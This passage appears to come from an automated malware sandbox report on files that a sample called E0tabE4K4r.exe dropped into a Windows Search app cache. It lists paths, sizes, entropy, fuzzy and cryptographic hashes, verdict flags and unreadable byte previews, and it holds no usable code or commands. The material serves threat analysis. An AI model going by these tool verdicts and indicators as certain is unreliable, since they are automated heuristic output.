                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8zjS8io0UVXf6flWEz7Be1tW178PBhSGGpcpgaDK0pqlKUsnm2bD:8fiolVSpzFe1tWSBEviBJVtD
                                                                                                                                                  MD5:E5012B6B0B46C808823A40A4AC664947
                                                                                                                                                  SHA1:CC0B07943BCB2B798C093A7C6DAB632DE2F36838
                                                                                                                                                  SHA-256:88FC2BE4E6912C67A935CCEF8487E2E6B6BB9681A23D42A146CFBFD77FA9FD88
                                                                                                                                                  SHA-512:1AE6420D0A11B01EEC93C228421FA9482D6CC94CDFA29F2C8EB834D48D0564DB10F27AE6241F37AE6A19684D448C5E094453FC63758A833DFC0124C095965975
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var WS.G......N...U..z.F&....R..pV.v..1n.."].U~k)Re..E.....1.N.....s.p\..2.....;..+.4..[....D.$..?.2>.n. .*..4.wu0x....#..v.j5.h....;.r.Y[.`.(5........0..F...=.a....^..V..$..B@............-...._xC.......'..L......7.{..:.j.....cY74~..r...;\4(}.m.>.^..S>s].O.....0.}..0.H...$q..U..........._nI.U3........a.....<..a.8.:..l.I.+J...76b..!..cq..x_...aU...g.O.&<?O:..>.......*..+9.7...W...p?....F...Rc/X.Z...C.QP.2.\|1.b...L.9..<.]..!7.%.."....d..Q..R..!X+ro=.dY..O.......f.[.......o..kA..es'...H(.E..L.._..V....o.v.j.^.9!.).$Y....A....!o.B...5.sG.4.d...?..^|d.l`IS.|..SJ.r,.]..O.....Ks..4E..m.kWs.F\....a.l.n...}.l..*....F.......B}.....i.....j...Lt......i.s.d?..u..x59..6$....).B.x..G..m%q....Q.=.......KM..Db]........W6.....-..dC.......A.X.....v-]u...!....4.....gi..}.S\\!._<....o.. .......^...W./[n.,..g..%ygk2.b Nu.#.....8...^1.=...<.^x<...">Ge.c...PF..<...6.=....}.c..v..CP.2...:Tx,..D.W...,55..dQ5.N.E.-.I.&..0p&.X.a... .z...K...bf.....N]n..{D.i...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):45781
                                                                                                                                                  Entropy (8bit):7.995107315342102
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:JxOjRBjLyNRbvteu3hx5gVnyT5tAWpeI9B5qorO+L9jMoE/NfYXL/F8R7BGZ:2jvyNvh3/ust/w+5H9jM31w7/K/0
                                                                                                                                                  MD5:5500DDB5C19C98724053EA2EAFED3A7C
                                                                                                                                                  SHA1:1EC705AC0AA4D78E0A39ED155546C7130D97D208
                                                                                                                                                  SHA-256:7F1CE1C103EECA1F7B21DFE168295B9389634D4D66D325CCB5154207C1FC4F62
                                                                                                                                                  SHA-512:261CF1EF961CE29F5B6760264ECABE3F799F94D738B11A6B8955B8BC30D17769B83B283C97678A0D9A278207A9BA6E3DF1906FD7402AD5159F85E8D0EDF0A761
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var WKExs.....T.%.lD7D..E..j|..C.>.-Af..(6O@R..@._U`QZ..L..a..zx#..o.7.Bg...)2.6u.E....$.8T.Vxh.v...K....Q:P~}1.....f.`hu....H.4...m...`=..8V ..8....l.z.[..f...AP.W~.......1A._%x....l.M..../.8tIT...C...4.o..eX.%...c.Mv.*..#.......|r......1"...D..e8.H.x.P_.W..rn{KU.&=.#rXJ?..fsr"/.)..&z.e.....?8:.m.m.mr......QO.\`...5=B......N@.$.....p..$_.[..;..+...@...b3w.q2T.K.S..}#C{.sfhU..F.&......d.-.g.N!:..8..g..G(...d..l.V..a..[.E%v....2O....._..Q.(g.rKi`}...S..b.^.Bc..9w"...D..Slu.SR`/.LY.......A.l.g.3.-g..\.N..S.V/...[..N}....F.9'D.._.....z......zlq.`.1g9z!.9/.7....6r.......?.......pL.'...p.\.r^9.x]y...]........t..v...!.W.......|..g..?..ty.@..$../..G...9..X...2.'.pbz.vJ...G 0n....s..d.,}...Vc0.......P8......Rf.*/..u....L.8.,ixF.t.i..mD7O.w.....T...N..RF...f'.F.."w.0....N.x..3.....|P)..[<DM.y...y.t>..-E.?.L.p..R.......d....Z8B7*.[..x.C.c.y....r.....0.~...p....._....Q.-..p9'*.SO.........`....C/.F%..t..(.OI4.c.>...hi.m....8..:R...W...>..X.X.+..T4"..r2.r...=B.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):349229
                                                                                                                                                  Entropy (8bit):7.124129372631423
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:ho7cTu/2NIedo8iLXgtOvoHwzDE0gSzqr7FF8uMkzhbwnf0NPC8Qib3fb7hWjHS:+ITnIeHOS0JzWRF8uGi/
                                                                                                                                                  MD5:D75E1C6534A1A1D6F737069BAD14303C
                                                                                                                                                  SHA1:423D99840238A7DFB692611F228BC848FA90CCC5
                                                                                                                                                  SHA-256:0D3DFF5A986E46E5F7B3AB1A683545B434C5B036CD8C45167053D7F62F0CB75F
                                                                                                                                                  SHA-512:2AD686787638F89E98B5BA8CA84281A8210D1187B3A280B73D5738A43097FD9B3E6A34CCE3615295011FBE65E059899A33E3B70D725AF750F2E7081E44F6B3E2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W...'..2Z.7.f.c.+.[.+.....?.`.`..XC...-..;H.Q.....R.]I.N..`?.\.5IM....O?lLL...1&.+...[.c..-...w..E.8@.E.:'.R^z/>..v..j..$..9.&.d.......N.pe.nc..D..!.:Hhyk..g....^H'..Q]?.gy..n...BT,...h...r.../.=BMJ.u....t4}...s!...=(....FS.b.D..Lx...*..D54..AI......[s2|../?=..K.W..?1....R.....{.Q....>4.........d.3..@4(....9.{..^G..d.R..d.....`.'.:z..+.....tm..G....}..R....,..NM..lnh.y<r.T.......s%.H.F....z..`..%.|......wM.F..Y..V%Y.......9.2. .!...B....s|g/JA........b...=...'(.....1]...<.......B.l}.0r....*.......(Uaz..L.U.K.p...,F....;H...c5m.GP.D(./MI.k.S....L...N0c.....X...y.l.!}1.B...b.....O.."q....o........8.#........7Tw.d.*.i*....%.....C...>./i..|...1...g.^..H.o.t.,..&n*\ru..[.....P.S......T...N....8.L...p*.{..r=....j.!....{..^..T\o...0...#>..x?}..w....85..(Yl.J.8P..Z.CT.p.u.c..yme~.......G...k.f...vM....5......P@..G.v.1.&.%K{..".1.l..T<;...s..}....G|.^ul......B.;....[.^$.|9..+.*.=S..+....Q....L..P_.87...o...+3..Ct).]4.z.w.[2.^..P.c......|.!6.h$cjg....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):127792
                                                                                                                                                  Entropy (8bit):7.998478262416077
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:BVj0LjspwguOiQroS8/TCozQVBj9iC0Bdh4W56:Bd0L6wgj98rCtoC0Bd756
                                                                                                                                                  MD5:BFB274925B66E46FB56C236D3FB21D1A
                                                                                                                                                  SHA1:74EFCC2CDE5F3ECF74443595B06D487987267ACB
                                                                                                                                                  SHA-256:916FD510B3C946382CC51EDFDE9AEA58462157FD6B2C9A6A697ABEF4998DA5F5
                                                                                                                                                  SHA-512:150BC0A9791F5D25FB4160337BAAEB46EE78C33F0AA6F33916C8090C44D95FD3C4774C6AECA691B6D882663EF5A4951B14BB8D8534559917D5849340B0F0EFE9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:(funcO....}(.*..<.g.C@..w.%....T.g.../..i....... ..c.q*...'h.......=..u..0.6m.u.$..q.oV.{...,V...u"#..._$U0....6..pq.R.......3...V`.c".........(X....xm&.%.,.c.xR......_.q.}.4."..../.c..1h...i.......c.P...4C.pX^..M...7meN<.!jYM....|...J.[.F.\.sB....W..X.Q......jC.2..zu._A.....l<....gh1...4...asj.QO..:.y.V..^.~.1..m......{.b......n.j<.\y-.~....:......x..d\MP..vq.f.......%.....W..2*m.<54@........x.2X..:.%..6..?............l.H.c...7...J...h4..%m...bB...!x...=N....\V...?R..m....u...... ....V.Q.{..de...G.*.....S0.yq"....Z..}....L.;.h....r.o...*..E...N.<G.kBz-...+...;..-.....Q.*>.>\.....rtq.>.>..T.M/f]X...F.I..............5.......x.FJ1F.'p...[.P........_:.....S.. %<..H........7...Y..{..&U*.9.<.NA.......7.bgnR.}...6q...@...!.G...8N......y.le.qzRG....G(`.n7..\h..,*............h.8a..Hx.@..v.|.eMN.$.iT....>..:..C......i.g|..[.an;....@.B7M}..L.......Bt.....i.../.0.f.r...A.}d....)..\H.~Y.f3...c.Ic..^....TLvf%87+.x>.`S....I..m.n...oP.p@.......

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\5fBhIWX2NfxoiM-aOLeKJczoLSY.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):234417
                                                                                                                                                  Entropy (8bit):7.613427071800634
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:QB4EYg5wquVCrMVjb1y6PoRXJkognkW6MUHwaXl+0SEDtMLoc6jxET0:pCOqhrMV/IlXJkognkW6MUHwaXl+0SE7
                                                                                                                                                  MD5:825B4D0FEE5DABEEE86E9F759A97A62D
                                                                                                                                                  SHA1:7A4F221EDB0BDE51589ED50315AEDAD0799F30B6
                                                                                                                                                  SHA-256:D93E4FA67F9EE50A1917E1461072E680B2C05E6BF6F43F8B43EDC5CF906278AB
                                                                                                                                                  SHA-512:ECB9B31088F528C5A74F47684B6E8C29513CB94FC2ADD1D3EEBA8F06F0604DF308CDF539551E4CDE0ED0C984DD10DD0B367473C7985D90FC2E4D704C822B7020
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W........n..W.5..b.N1M...V,.*.....<.<S>F&......rD...t...n..S.\5 ...N......=POY...u]....ZR=....e.S..`..T..H.....@3w..g..D.t..d.. .u......u.w.0.F.b.U.......B.iRL.|.Y.>...jE......:....Y)..,R.b.`sY.A...&.<...=.......B.x./..q...{\..........'..-...^n..t.Fk.#..t~.=\...^fS[...e..6h..^.V.5...<.e.....$ .x..0..0>..%..usL.k...[.+`L.C..^&\.o.f...7....V..X..%&.....p.....?.|...........6*.........U.g...^...|......% .. .b.K...:...<.)p..N.k/h....Ro..7.w.n.....;CT..9..Z.......F........n..6.V.@..Xd..*&).nU..SJl.C...a9.....w.^..;|....fjR..t..{-...;..~o?D..............#.l....).....T<'.(t-...H.'Q..'.'H.......ZWXqFk.u.~.?....v...@....n.}yv:.O....*3....Wg.gY`e..D$dydJ.\b.TB....../...A[{..*[S..`.g...s...jh..s.)..B....)....p..?...MX.m.#'..O.V...hq;C..n...[.cC..u...BDY..Zwq...L...M.F....8....Y..<j..6t.J.s@1=..T....9...[3.E.m3...lG...%."..e:f.QM@.^V1..Z...../......S'>`'.."f..DAt.w..8..Z.*1 dN._....*gB..y....$......4........Nn......!....U.W....P.b&~(...G=..;.....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\7keH62cNTOqo8SU4xXMfYfcmvcI.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2436
                                                                                                                                                  Entropy (8bit):7.9343954947422946
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:vZWxPxGb508t53Xk8MF3YhM4T112p2VvoKW3pkGzD:xWXGb5/nk8MF3KV5oKWGA
                                                                                                                                                  MD5:349ED1B82D091D955419D78909F75887
                                                                                                                                                  SHA1:3106AC496E81C5CAB20DE56A45CE7DE84A752644
                                                                                                                                                  SHA-256:4B176C2E25B080692105F6E996F6F3F2AD54077A2FF21A46C1F6442451DD8CEB
                                                                                                                                                  SHA-512:AC8E7E51707A307B404FA60AC7677A4198BD702BE60F43E263D47D60769E6887BE2051AD6A069AE20D3D8A53BECA32202F569864FA0DB49D753301493E7EE846
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W.."J....|V.(.-...!<..8.o..~...B.(..k...*wN.<).A...t..Vs....J.y..SZX..(-.. .!.x.0;.......#bH........N1.cLX/..~.....-m.-nen...].t)1#8...fw.Wl$.....g..yR..{.I..^....].d..+. .f.l/.5./f...#....O ....@.=.$.o..=...?\..d.........../k}..Z+...M(.j?.RoJ..3.*.%jB..k.Hd..Q..'."W...R....op.S.7..'.X.v......-...),..w....!.........z ..s......g.Ss.#...k....5KJ....&.F.......$...\X.....y...s..^D....[...........%...Mux.~./...qLu.........6nO...R.bm*.....g2.Y...Y..zra.&..._Z..k..|. .m..$.Y\K....^s#....-.>.d.U)..W.......d.R.pY..OQ....%.t...................>.-v.+...@X0.].k..K...Pq.O.+....... =...F.L..;.....C..|...Do-.:.'F.gg.:...e...zc.....V.+..y.Fl+%_...p.....4(..v...[..@....ye.8.j..X.r.W._.*....V.&..]....YA%i....':...t...l..4.L.c.aIw.-.18.0...l6u...Y..`.^...l..&......x.._.z"t....UI...%.U...z.a].?.hf9I..1...sK.H.yn.mL2..w..n....x.)........T1/.c-.x$n..kI..XT.Q.,....kS.......B.`D...@...L..tr.\Q6..b.G.piQ.LC.EW..*g.M[L..9z.....1....>.lZ..d!uU...Xz..]..>..$.qXE...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\8yOt-qMgl3wFFpnXBbdaeUrdWpM[1].css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16301
                                                                                                                                                  Entropy (8bit):7.988766370520974
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:Qvprwu9wWl9uVgBZJDTLW2f0DlDA5VQBGzjprtzj6/At7Jdcrui:QhrhyWl9uVSbHf0JDA8g5d6/At7Yrj
                                                                                                                                                  MD5:0D1EC65A55968B3F61A545CD05F77AC7
                                                                                                                                                  SHA1:26CAF5FF4C8623F8C8456A3A3A6CAD1E5982744C
                                                                                                                                                  SHA-256:0E9DD388074B6C9961C2CC9E0DC46B39E85F3281549AA4BE57717886AE531F6B
                                                                                                                                                  SHA-512:BACE0AEFB94EDEC7ABBDA2F103B532AC60AE599B552AE2BDBA28D5BABF7A221264A19E4C6C1D4B9AFEC7C0EA79827B31836D6769C37FF9F3ED44F3703E935E15
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:html{.'....QV.%1....S..1(.L.........rCD.._.{q.`m..r....8.H.m.>.........-../|.....O..D..A.........J.5........fD....|...da...p.@.cJ.fV!..WH.V.W...?...G..G..f... ....?_.0...(...)"5.iv...j.....l.HtH!..yA|.KoB...._..nj..J.V.@Q.!..:J[....."...Y...Nc...+...P7.e..U..*.........z..."..i.BNY.Z.r.[.Md.....@jh.`...P....b.R.Y...5_...V...?..Z.{/...<9..|..t....=.....Sy...........PTK.......N......A(..[..M...P.Y....$,{.8...|'QM5.D2..Q.h+.9... mq...pZ.,.J.>/....z....E..m.vV.T......N.bL.Me>x+.O..;..........x.p.J..&.D.../;.e....C...j.*...~...!...Ef.&M.M<..A....P.........n..943+bf.h^...#WJ.~{..e<.I.....<...............]....s.'........6yp.v..OC.Q...1.5x...y+.)......[?:Q..[`..O\...^.g36..TM+>.+.0E.,.~.W..z,.[.."H.........*..;....r..^..D.2..#.......=...K\..v..:..q...{.o.B.p.W1g6..Z(.5....Yy .77...N..\...(..y.......0.....+c0...=[X|]Md.]...h....6..I....Aa|..fo>....Zb-....D....F[.>$?..n..G...O2M,.&..gx.[ ...........R.d+y`..;.v.@....M.1..9..I. .....]....zyz04_........

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\9NAKqY_tlD66IpqKerRN4qs4P0c.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2444
                                                                                                                                                  Entropy (8bit):7.919333901258957
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Fw4AIKIBPxiQIVIc0hvFEhw7OHvU/E9MvQpamD:0IK+QP70mhBPR9Fa+
                                                                                                                                                  MD5:AD8EF5DED56D5ED1F561EE1414D0155C
                                                                                                                                                  SHA1:E663AFDD4DF0262037273799FB9BDA4FD9C3E97C
                                                                                                                                                  SHA-256:6E25B3B30DFC7ABAF06AE66DB9C5A0C746A722DE582EE0AF81A827525C125CFF
                                                                                                                                                  SHA-512:AB5325624094170471FD1A47DC96CEE3AFF5AA604A18B7771C9D4DAB7CD755ED4D63488392EF0114040888049AEB49ACCDBE9CC8E815B953F5AEB316EDB88FE3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W./...P....aR.O.z..B.7..~....1...<k"..z..5..m.....ao.>.d.ghHA...M._)~..s.v2..L....1+.}.t.0Iz.)..qa..v.....=..Bs:U..u..0..N.B.f..k....;...%.j0I..M...6l...Y.:..n.{....wr.=.Q....i.Gm..T..CJD..4]..QH...T.....r5.....(.l..r..S]q....!z. J....D.nE.e/...bS...O......~..1..@.....#\1{x..q.!t.4.S..f.....|...,.o..3..*n.....K....R..OC.}~..g.i.g.e..?4Z}....$uT...;*s.o.."....{...P.'g.[|.Q..1...3O.<....Z..-....0v.q.r.8...$.i$._R@....2.ve.&..BH.e......xC..%yQ.MM7a..7.V......D.j:a.I.....c4..Jc...7.......Q\.<......*"W..G(...:|.......\.HE.r.....(.G...*..B.l.#...././_.,.X|......U.\O....tc+N@.%.....2...Iy...LF.. <.....].....v.X..t..H.8.e......3`....].............T.4..5X./.4 .iO.-.dEx/.6.`.....&..`.6..Q.K.Z...#....5qU.F.Q...g.R....K_g.VL.....s>n.a..Q$.....4..op..U.g.S..:_$..Es.......T..f,.y.1..$Hk5.e/....'s..T.|...$...qt..N^..G...]P.....O.~]..5.;....7+..`......h........AL...f6Zk.FbL.../=.bM.2...R6....7.i.-...gL..z.84 ZN.Y..M..%.-|m..Z...iQX...@*.K....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\9eNI3ykoxUBcfNRgDJaF-g0a_0c[1].css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):9567
                                                                                                                                                  Entropy (8bit):7.981046148578827
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:/h/rmcdQWvmZ6VYRe+sJkSn/XnbVfMKpFDN3vCV+M+2:/h/ScKumYOR/s1/3bVfMKmP
                                                                                                                                                  MD5:3895A0CFBD3237EAF8D70E1D4438C060
                                                                                                                                                  SHA1:7E8446518F814E6D77AFE8E16F61B30D1374C26C
                                                                                                                                                  SHA-256:6B914C44ACE57856F44DCEB752866ECB78A13335007F532A6172493466E2A7E4
                                                                                                                                                  SHA-512:23BC59B12A7D7B44E38E311593FE3045CE68AA6E53CE4C9FDC35FB5FA7EA6FB69C94915B2F42D507260E598DDE577EA9FFDF62459BAC19462276FCE7B8EDC092
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:body 8..B.l8.........n.Y..9-..pe..=n...VS.A./ZN*u.D4e...~&<O.W.x.K..u".......l..!.....=."..`U.P....V...~.M...N..0.....3k...'q..!hY...Z5[...N..+#......k....B....Q.L^$.b....Z.N...6.&....5.../...@Is.S_Y.6..\...[...h1.[j......k.`...v|.#f(..j.....lR._..*W.,..J.n......v.......L.......G...H.2[}..S.vK..w/J....P..mx.].{{t..'J.....:..yZ.....2O...*h.|y...."n....B..2?.?P.....n.V.....m"G.Q.X,c.1.L......V]..2........r].......{,:.*!.N..ta..#..=+......O..$~^.=..3n[..B..#Q.^.[....+.....{....\s...Fb*#....l..7..a....S..?9.S5.U....._....x..V......fI....6z..d\...b.c;Q._..]\2..E>./.g2.)......fBV.i...Z.=8..n.T...@..x..LP...5.^..B.u..&A]..5.[;.o....t..4..#t/..&.....]j.oO..x.......=..P..%.z.V:=..O..K.J.4g.r~.......9....k.aZ.^VB.I&O......a.S7.........Mu/...~Gr...pL....=<..v....Z'w............Z.........:_...l.."(..t.- &.ON..^....%X..29.....6..8.):..ewI.|...<.b...0|.....$...P6.zS...&.*...;...Z.#`.5{I....u....-.dE.N..~4......;..;.. JO./4R....g..q".@..l!..I.._DP.......%c...8.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):192924
                                                                                                                                                  Entropy (8bit):7.859786556211567
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:0e84dtS0nj0tpH8pcJrK9IB4Nh/ziudZo1w12T2zffbG5TdlA2Zi5FUmrGb7ounz:08gucINh/VNe2zXq5Vjnz
                                                                                                                                                  MD5:6E6DD580FE5A228B13947C5BFC07821D
                                                                                                                                                  SHA1:2EC0F30BAD36B614395762BF2F06C641A2E2F382
                                                                                                                                                  SHA-256:080524929E4A5948C9AA97B76452F7AC8FA22503C65B60A38147D7950DD19689
                                                                                                                                                  SHA-512:44355E643A1D36376C445DC7B73CBA8CC81ECD6C628388960FCDE21D7F0E9306D3EFC0F4CE238FC6A243A2416C3A9BA3530734C8F2C254A18BF2DBE3247DA11F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W..D.d6.t....... !v...l.R./v.(..9. .;W_=?..7...r.W.wW.6R.........Q(~...u`.K..l).....K..6E.{n.d.A..d.C.x.v..xr.Q........e..zM.z.&........R.%.9.#s....".....-I..s..V..`./.n_..d4Y..<.|?.....L.<.!..f.....^...pt.!...!.~J...F.....I..........\.F./y5....."^....2::.i}|..=uq......ar.Y./|....F..;M.....E~.*tU.u..n..........w.z....i6.2..Z...3..v.......W.QS......{.....~<Q.-.. .t$........(..f..b....I.".L.O...O..2,...Yr..,~7.....3U..a..d.............rR:....o..C..M!..E~.......U....4........~...#Ur...I...>....F.LqO.^D..}%.qF...?.@.P.i_K...Gc`.".......\.X&....xt..x~M'4...R.!dg..w..b...'Q.....OsV.x.E1..j..=2E.i/...g..Y..j._.e@k....q<...M..D.w..o....v....hn.l.-....0e..f......".xN\v.E"..k......K..z..>.o4..D...|L.z.V...:........$....+/e..XS...V.$]......n..\.<...@)..}..."8..<......c./.&.q..V.h..%....M............`&..#.8.Q...a.h"k,S.4...g.$7e.P..+F./.z..G.~..K.m.x...g...bg.N.F_.....fi.o.." .o0e.K...P........({.o..*.j}.P>/ .}...K.N)......)e.L.*^.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):131722
                                                                                                                                                  Entropy (8bit):7.998596847414006
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:zSZIcScgnXwTaxBoOPJLlX5mpGlOIXmXRR5h+Vl5WDjON/c3sYwXQZbNUBk:zrcAAOZX5mpy+RlD2UcYwAZbNck
                                                                                                                                                  MD5:17227C62B33584AD3B500A9DC2383967
                                                                                                                                                  SHA1:CD283A237B7D4A73417013BCCCE8C5232A81009E
                                                                                                                                                  SHA-256:356F2361720414976A3EABADF6D697BCC1C3FF484A6ED58AF6990AAE3B94BA01
                                                                                                                                                  SHA-512:346939CD3EB005E6AC0462934803737BC2832B59589BDC8318C2CE9FBD65896645B605832E776BE4AB47586BC86D380CC459C80EB0FDCD3F5EF05141F160621B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:/** @.}.C.t..'$#.a~.;7.o..CU.....A..9.,.*...m....1...)..}.....h.f,=...........}rCj...."..IA.hN..FE:..<....Y7.....F..v.....3....@...*d....7..7.O.v.X?..M.|..8.P..@...n..8>u...]....}2..3.........,Z)..=VF..U.it.'.......d.......`.5.F..:..2..e.f...M.$".d....u.hk$....J.....*#\.7.RL.....pmt;.)*.X...0........[-.M..+.t'p.9S..V^..5.0H.~..@.^..Z.Z...k.h......pj.EmF.~F..L.U..v.>*W..[.D.Ck...^.qN&...7.@*...y.K...`.....)......Y.3.(.H...NM]..../..t..aG.h95........o..k;..V..>[^rh...9...{7.R#k...0]..c....aU..O....k....1/B..o.>......q.;L..p..M......S&.k....c.0.'.......JP...y..\r........u...G.0S...E.`.......".9...+e.N...(t...%o.r....q..G[....JmA..}....c...>D*h.8.E.?.xRq/.....;.B...5btT1....*../..:..d.;.....6..b..p..U....|....]..X..}..L.<..b_4....M.7..7....t.4{.r+Bk....P...._.mZ.2p..0....q..G.m.'...0..R.....k.$..^.v..o%.].%.1n8..6M#F.D..@.D0...@.w....u....p'.@]x4.ge.....\...*9.'..h.....|0u...^>./..w......."....c6,e5.tnXZ.?vOT..R.5....(.vh?kq)F...W.<:..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\EJz06avERkAqfuwcXY6H5w8dtNc[1].css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):428901
                                                                                                                                                  Entropy (8bit):7.030151732651084
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:XYs/hv2sEnafMS6A3oRd9V9EeLp00HlmZoYh0yh881y:rR2va0Sad9V9EeLp0WlmZoYh0yh881y
                                                                                                                                                  MD5:5A03C479DD6F76BC0D7314FCB61C81CB
                                                                                                                                                  SHA1:82D7C8961E218417FDE09A422FE22DD6314ABDAB
                                                                                                                                                  SHA-256:09EE1FE947CBAB3462EA4766AC2C8AEE3EA6A377613C964128F0A87D99063B02
                                                                                                                                                  SHA-512:0619A401216D200E360FD1227A4A19635F98E088B0F6BF919E38A5D15F08E7C8EDFCA1197CD4C1BAD2D58F09594497606760803C131D465FCEA958AC42BC741B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.scop....U%m...6F..e.M..m.jJt......d.B...S/L..../.,`...h.\H.Z....Jo.X2.j..;......3....h......7..N\+....e..*..L.d......O...].._.......e.....a...^....ye....Y.@g..~..._.j..0...Vjv.h..t.Mc.V,...!....N.&{....r...p.v|Wp....q..& ...ny......5H=F)f..5f.v..<2..x.|..l.;F.Ye.....z7.>.y..h.$J.j.<:.Z@.....d^{..G....U.....X.L......D<.59.y..Jc.8|.N..&.o....<x@.......r|..KV/.`4..k...........F..?5.'.Y.z.Z.d...5g.?E.......z......].....l.t.ja........M.(...4..3.....U...3..M..f..K>.)...&..l....yO.!.3.V./tSh[..n....-.....U]\i.%S,....G3.._+-.6.[.V.r~...B.#...S.."p...*.3..z.k....4a....m.p%..I.Cl.ur./jp..j.C.:0.,......F9.{.lA.,.~cmT.L.F....z..R.6w.........Y.L..)k...>....v.....K.U0.[..h........:32Jr...26..5.......s@.#....g)...*L...F|'..v..ruA............SY4.<.DF...O....#@........R-g.W..:...8B(....X%.{..\=.?.C......nZQR...~C.I.. ......@.O.YM.4....~.../_...v...<..y...1o.>..m..][.....:.u.A:._G.r+...X...J.... .q..5.p..... .w..2....PB/.w....'.yeS..N]M3`...#m.*.....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17832
                                                                                                                                                  Entropy (8bit):7.9900411262832804
